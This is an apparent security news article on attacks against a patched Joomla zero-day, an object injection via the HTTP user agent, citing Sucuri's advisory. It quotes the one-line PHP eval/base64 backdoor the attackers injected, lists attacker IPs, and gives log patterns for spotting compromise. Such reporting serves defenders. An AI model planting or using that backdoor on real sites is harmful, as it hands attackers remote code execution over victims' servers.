UpdateAttacks are accelerating against a now-patched Joomla zero-day vulnerability, putting pressure on site administrators to update quickly.
The patch was published on Monday, but not before attacks were spotted in the wild and carried out for at least two days, said researchers at security company Sucuri.
The zero-day is an object injection vulnerability via the HTTP user agent that leads to a full remote command execution, Sucuri’s Daniel Cid said in an advisory posted Monday. The vulnerability affects all Joomla versions from 1.5 to 3.4; hotfixes are available for older versions of the content management system, such as 2.5 and earlier, that have already been put on end-of-life.
“The current exploit we are seeing live uses an objection injection vuln to insert the following code into the db,” Cid said:
> eval [(] base64_decode [(] [$]_POST[111])) ;
“That’s a backdoor that executes any PHP code passed by the POST variable 111,” Cid said, adding that a technical analysis of the flaw has been published.
Cid said that attacks began Saturday from the IP address 74[.]3[.]170[.]33 with two more IPs joining in on Sunday: 146[.]0[.]72[.]83 and 194[.]28[.]174[.]106, escalating quickly to a few hundred sites being targeted to likely all sites running Joomla.
“The number of attacks escalated quickly because it becomes a fight to see who is faster and who can compromise the most sites first,” Cid said. “In fact, we are seeing some post-exploitation tactics that patch the vulnerability after injecting additional backdoors (Filesman for example).”
Sucuri recommends filtering logs for either of these IP addresses or looking for “JDatabaseDriverMysqli” or “O:” in the User Agent.
“If you find them, consider your Joomla site compromised and move to the remediation / incident response phase,” Cid said.
This is the second similar incident where a vulnerability was disclosed and patched in Joomla that was quickly under attack. In October, researchers discovered a SQL injection flaw in the software that attackers were taking advantage of within hours, in particular against two popular sites running on the CMS.
Sucuri, for example, found two scans, one looking for SQL syntax errors caused by the vulnerability, and a second requesting the admin user session from a table on the CMS, which would allow them to run their exploit.
This article was updated Dec. 15 with comments from Daniel Cid.
blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html
blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html
developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html
docs.joomla.org/Security_hotfixes_for_Joomla_EOL_versions
threatpost.com/attackers-targeting-unpatched-joomla-sites-through-sql-injection-vulnerability/115179/